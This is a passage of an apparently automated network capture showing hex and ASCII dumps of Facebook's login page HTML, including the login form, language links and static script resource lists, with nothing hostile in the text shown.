                                                                                                                                  Data Ascii: - _9ax_ _9ay1 UIPage_LoggedOut hasBanner _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="mq6mOvYT">requireLazy(["bootstrapWebSession"],function(j){j(1666037240)})</script><div class="_li" id="u_0_0
                                                                                                                                  2022-10-17 20:07:20 UTC1085INData Raw: 66 22 20 69 64 3d 22 65 72 72 6f 72 5f 62 6f 78 22 20 2f 3e 3c 64 69 76 20 69 64 3d 22 6c 6f 67 69 6e 66 6f 72 6d 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65
                                                                                                                                  Data Ascii: f" id="error_box" /><div id="loginform"><input type="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_se
                                                                                                                                  2022-10-17 20:07:20 UTC1087INData Raw: 69 76 3e 3c 2f 64 69 76 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72
                                                                                                                                  Data Ascii: iv></div></a></div></div></div></div><div class="_xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a hr
                                                                                                                                  2022-10-17 20:07:20 UTC1088INData Raw: 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 67 65 28 22 65 6d 61 69 6c 22 29 2c 63 3d 67 65 28 22 70 61 73 73 22 29 3b 74 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d
                                                                                                                                  Data Ascii: return function(){var b=ge("email"),c=ge("pass");try{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=
                                                                                                                                  2022-10-17 20:07:20 UTC1090INData Raw: 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74
                                                                                                                                  Data Ascii: ok.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=htt
                                                                                                                                  2022-10-17 20:07:20 UTC1091INData Raw: 6f 72 74 75 67 61 6c 29 22 3e 50 6f 72 74 75 67 75 c3 aa 73 20 28 50 6f 72 74 75 67 61 6c 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63
                                                                                                                                  Data Ascii: ortugal)">Portugus (Portugal)</a></li><li><a class="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoc
                                                                                                                                  2022-10-17 20:07:20 UTC1093INData Raw: 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 36 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63
                                                                                                                                  Data Ascii: uot;, &quot;www_list_selector&quot;, 6); return false;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onc
                                                                                                                                  2022-10-17 20:07:20 UTC1094INData Raw: 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69
                                                                                                                                  Data Ascii: \u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxi
                                                                                                                                  2022-10-17 20:07:20 UTC1096INData Raw: 2f 2f 77 77 77 2e 6f 63 75 6c 75 73 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 4f 63 75 6c 75 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46
                                                                                                                                  Data Ascii: //www.oculus.com/" title="Learn more about Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2F
                                                                                                                                  2022-10-17 20:07:20 UTC1097INData Raw: 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 43 72 65 61 74 65 20 61 20 70 61 67 65 22 3e 43 72 65 61 74 65 20 50 61 67 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61
                                                                                                                                  Data Ascii: ooter" title="Create a page">Create Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a
                                                                                                                                  2022-10-17 20:07:20 UTC1098INData Raw: 22 20 77 69 64 74 68 3d 22 30 22 20 68 65 69 67 68 74 3d 22 30 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 2f 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61
                                                                                                                                  Data Ascii: " width="0" height="0" style="display:none" /></span></div><div style="display:none"></div><script>requireLazy(["HasteSupportData"],function(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpDa
                                                                                                                                  2022-10-17 20:07:20 UTC1100INData Raw: 31 38 34 30 38 30 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6e 59 63 74 6f 54 73 72 37 61 6c 52 69 79 36 30 22 7d 2c 22 31 38 34 38 37 34 39 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 47 73 48 39 4b 62 2d 33 57 2d 74 61 5a 68 65 63 22 7d 2c 22 31 39 30 36 38 37 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 46 2d 34 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 4c 57 34 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37
                                                                                                                                  Data Ascii: 1840809":{"result":false,"hash":"AT5nYctoTsr7alRiy60"},"1848749":{"result":false,"hash":"AT5GsH9Kb-3W-taZhec"},"1906871":{"result":false,"hash":"AT6dIBiVv9bUDXlmF-4"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpLW4"},"5541":{"result":true,"hash":"AT7
                                                                                                                                  2022-10-17 20:07:20 UTC1101INData Raw: 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 4b 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 37 58 46 72 73 4d 5a 61 6d 76 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 76 47 74 32 6d 78 7a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73
                                                                                                                                  Data Ascii: tps:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yK\/l\/en_US\/7XFrsMZamvv.js?_nc_x=Ij3Wp8lg5Kz"},"vGt2mxz":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/s
                                                                                                                                  2022-10-17 20:07:20 UTC1103INData Raw: 2e 70 68 70 5c 2f 76 33 69 4c 6c 35 34 5c 2f 79 6e 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 55 39 69 37 53 4d 63 77 48 36 73 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6f 5c 2f 75 6e 79 72 6e 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 65 47 61 68 6c 57 63 78 56 6c 6e 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 65 4d 6b 4d 78 48 5a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33
                                                                                                                                  Data Ascii: .php\/v3iLl54\/yn\/l\/en_US\/U9i7SMcwH6s.js?_nc_x=Ij3Wp8lg5Kz"},"o\/unyrn":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/eGahlWcxVln.js?_nc_x=Ij3Wp8lg5Kz"},"eMkMxHZ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3
                                                                                                                                  2022-10-17 20:07:20 UTC1104INData Raw: 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 71 31 6a 53 5a 38 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 72 5c 2f 46 31 6e 57 6d 57 61 42 4f 65 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 51 37 6e 5c 2f 39 6a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 57 5c 2f 72 5c 2f 79 4e 59 63 63 35 65 43 6a 75 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6b
                                                                                                                                  Data Ascii: c_x=Ij3Wp8lg5Kz"},"q1jSZ8c":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yH\/r\/F1nWmWaBOeO.js?_nc_x=Ij3Wp8lg5Kz"},"jQ7n\/9j":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yW\/r\/yNYcc5eCjuy.js?_nc_x=Ij3Wp8lg5Kz"},"k
                                                                                                                                  2022-10-17 20:07:20 UTC1106INData Raw: 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 33 5c 2f 72 5c 2f 74 6a 51 34 46 48 5a 4e 42 5a 49 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 79 68 6d 4d 4b 66 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 76 43 36 34 5c 2f 79 71 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 34 5a 6a 6d 33 64 75 5a 47 72 51 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65
                                                                                                                                  Data Ascii: bcdn.net\/rsrc.php\/v3\/y3\/r\/tjQ4FHZNBZI.js?_nc_x=Ij3Wp8lg5Kz"},"yhmMKfP":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ivC64\/yq\/l\/en_US\/4Zjm3duZGrQ.js?_nc_x=Ij3Wp8lg5Kz"},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.ne
                                                                                                                                  2022-10-17 20:07:20 UTC1107INData Raw: 51 5c 2f 72 5c 2f 77 34 48 5f 31 59 71 67 70 4c 76 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 32 47 70 61 6b 5c 2f 31 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 58 75 34 5c 2f 79 31 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 58 4e 36 4d 39 6b 79 61 4b 52 58 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 69 46 75 50 62 57 68 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 61 5c 2f 72 5c 2f 72 39
                                                                                                                                  Data Ascii: Q\/r\/w4H_1YqgpLv.js?_nc_x=Ij3Wp8lg5Kz"},"2Gpak\/1":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3ieXu4\/y1\/l\/en_US\/XN6M9kyaKRX.js?_nc_x=Ij3Wp8lg5Kz"},"iFuPbWh":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/ya\/r\/r9
                                                                                                                                  2022-10-17 20:07:20 UTC1109INData Raw: 53 5c 2f 49 30 68 4c 78 4b 73 63 6d 71 79 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 63 59 55 33 63 33 32 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 43 5c 2f 72 5c 2f 6a 51 46 6c 74 34 67 79 70 39 52 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 33 4f 67 53 4a 45 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 5f 5c 2f 72 5c 2f 6a 69 58 4c 74 37 7a 61 4d 49 70 2e 6a 73 3f 5f 6e 63
                                                                                                                                  Data Ascii: S\/I0hLxKscmqy.js?_nc_x=Ij3Wp8lg5Kz"},"cYU3c32":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yC\/r\/jQFlt4gyp9R.js?_nc_x=Ij3Wp8lg5Kz"},"3OgSJE4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y_\/r\/jiXLt7zaMIp.js?_nc
                                                                                                                                  2022-10-17 20:07:20 UTC1110INData Raw: 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 62 30 79 30 58 59 77 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 72 51 4c 34 5c 2f 79 59 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 47 79 74 6b 52 5a 46 4c 42 77 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 47 72 78 57 58 32 65 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 50 76 56 7a 58 39 45 41 4b 46 61 2e 63 73 73 3f 5f 6e 63 5f 78
                                                                                                                                  Data Ascii: j3Wp8lg5Kz"},"b0y0XYw":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3irQL4\/yY\/l\/en_US\/GytkRZFLBwM.js?_nc_x=Ij3Wp8lg5Kz"},"GrxWX2e":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/l\/0,cross\/PvVzX9EAKFa.css?_nc_x
